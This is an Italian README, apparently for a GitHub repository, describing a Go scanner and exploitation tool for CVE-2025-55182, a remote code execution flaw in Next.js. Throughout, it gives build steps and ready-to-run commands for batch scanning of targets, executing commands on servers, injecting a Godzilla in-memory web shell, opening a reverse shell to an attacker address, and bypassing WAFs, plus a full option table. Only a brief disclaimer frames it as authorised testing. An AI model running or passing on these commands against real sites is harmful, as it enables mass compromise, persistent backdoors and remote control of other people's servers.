
Scanner e strumento di sfruttamento basato su Go per CVE-2025-55182 (RCE in Next.js). Supporta scansione batch, esecuzione di comandi, iniezione di shell in memoria Godzilla, reverse shell e bypass WAF.
CVE-2025-55182 strumento di scansione e sfruttamento delle vulnerabilità per l'esecuzione remota di codice nelle applicazioni Next.js. Supporta scansione batch, esecuzione di comandi, iniezione di memory shell Godzilla e funzionalità di reverse shell.
⚠️ Questo strumento è destinato esclusivamente a scopi di ricerca sulla sicurezza e test autorizzati. Non utilizzarlo per scopi illegali.
.txt.success.json e opzionalmente esporta gli URL vulnerabili in un file specificato.[
]
git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
cd cve-2025-55182-POC
go build -o cve-2025-55182 main.go
./cve-2025-55182 -h
./cve-2025-55182 -u http://target.com:3000
./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt
./cve-2025-55182 -u http://target.com:3000 -c "whoami"
./cve-2025-55182 -u http://target.com:3000 -g
Dopo l'iniezione riuscita, lo strumento mostrerà l'URL di connessione, la password, la chiave e le informazioni dell'intestazione per Godzilla.
./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444
./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10
success.json: salva automaticamente i dettagli di tutti i target sfruttati con successo (inclusi output dei comandi, configurazione Godzilla, ecc.).-o: salva l'elenco degli URL vulnerabili (uno per riga).Durante la scansione vengono visualizzati in tempo reale una barra di avanzamento e le vulnerabilità rilevate, con statistiche finali.
-p per impostare il proxy.-to.Questo strumento è destinato esclusivamente a scopi di ricerca sulla sicurezza e test autorizzati. L'utente si assume ogni responsabilità legale. Gli sviluppatori non sono responsabili per eventuali usi impropri.
| Parametro | Tipo | Default | Descrizione |
|---|
-u | string | Nessuno | Singolo URL target (es. http://example.com:3000) |
-f | string | Nessuno | File contenente un elenco di URL (uno per riga) |
-d | string | Nessuno | Cartella contenente più file .txt |
-o | string | Nessuno | File di output (salva URL vulnerabili, uno per riga) |
-t | int | 10 | Numero di thread concorrenti |
-to | int | 10 | Timeout della richiesta (secondi) |
-c | string | Nessuno | Comando da eseguire (es. id) |
-m | string | Nessuno | Modalità: waf (abilita bypass WAF) |
-p | string | Nessuno | Proxy HTTP (es. http://127.0.0.1:8080) |
-g | bool | false | Abilita iniezione memory shell Godzilla |
-rs | string | Nessuno | Indirizzo reverse shell (formato IP:PORT) |
-dv | bool | false | Modalità dettagliata (stampa il processo di scansione per ogni URL) |
-es | bool | false | Modalità scansione informazioni sensibili |